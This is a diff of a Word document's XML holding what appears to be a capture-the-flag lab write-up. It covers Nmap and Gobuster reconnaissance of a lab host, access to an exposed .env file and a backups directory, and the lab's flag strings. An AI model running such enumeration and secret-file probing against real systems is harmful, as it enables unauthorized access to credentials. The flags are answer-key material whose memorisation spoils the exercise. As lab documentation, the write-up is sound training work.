-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Explanation</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>-sV → Service version detection</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="22"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>-A → OS detection, script scanning, traceroute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Results</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Open Ports:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="EE0000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="EE0000"/>
-        </w:rPr>
-        <w:t>• 22/tcp – SSH</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="EE0000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="EE0000"/>
-        </w:rPr>
-        <w:t>• 80/tcp – HTTP (Apache 2.4.66 Debian)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Port 80 was identified as the primary attack surface.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Screenshot 1 –</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Nmap Scan Output</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E9A23D9" wp14:editId="555264E4">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55FFA5FA" wp14:editId="7775D50F">
             <wp:extent cx="5731510" cy="2820670"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="130953529" name="Picture 29"/>
+            <wp:docPr id="2038220914" name="Picture 29"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -4768,7 +4681,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="130953529" name="Picture 130953529"/>
+                    <pic:cNvPr id="2038220914" name="Picture 2038220914"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -4801,471 +4714,127 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Step 2 –</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Phase 2 –</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Directory Enumeration</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Tool Used</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Gobuster</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Command Used</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>gobuster dir -u http://192.168.5.84 \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>-w /usr/share/wordlists/dirb/common.txt \</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">-x </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>php,txt</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>zip,bak</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>,env</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Explanation</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>dir → Directory mode</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>-u → Target URL</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>-w → Wordlist</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>-x → File extension brute-forcing</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Extensions searched:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>php, txt, zip, bak, env</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Discovered Endpoints</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>• /login.php</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>• /register.php</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">• </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/.env</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>• /backups</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>• /config.php</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Critical findings:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">• </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/.env</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>• /backups</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Screenshot 2 –</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Gobuster Output Showing Discovered Files</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
+        <w:t>Web Enumeration</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Accessed:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId9" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>http://192.168.5.183</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EC33583" wp14:editId="71B55A34">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F456956" wp14:editId="2C84A334">
             <wp:extent cx="5731510" cy="2820670"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="1716407539" name="Picture 30"/>
+            <wp:docPr id="221043152" name="Picture 32"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -5273,208 +4842,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1716407539" name="Picture 1716407539"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId9" cstate="print">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="2820670"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t>Phase 3 –</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Exposed Environment File</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Accessed:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>http://192.168.5.84/.env</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="26"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>The environment file was publicly accessible.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Sensitive information exposed:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>• SECRET_KEY</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>• DB_PASSWORD</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>• ADMIN_EMAIL</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>• FLAG</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Flag 1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>ThunderCipher{Env_file_exposure_leads_to_sensitive_data_disclosure}</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Screenshot 3 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>– .env</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> File Contents with Flag Visible</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57011DF1" wp14:editId="15A6ED17">
-            <wp:extent cx="5731510" cy="2820670"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="1792798007" name="Picture 32"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1792798007" name="Picture 1792798007"/>
+                    <pic:cNvPr id="221043152" name="Picture 221043152"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -5505,147 +4873,46 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Phase 4 – </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Backup File Exposure</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Accessed:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>http://192.168.5.84/backups/</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="24"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Backup files were publicly accessible.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="24"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Sensitive internal data was retrieved.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Flag 2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>ThunderCipher{</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Backup_file_exposure_leaks_sensitive_information}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Screenshot 4 –</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Backup Directory Listing</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
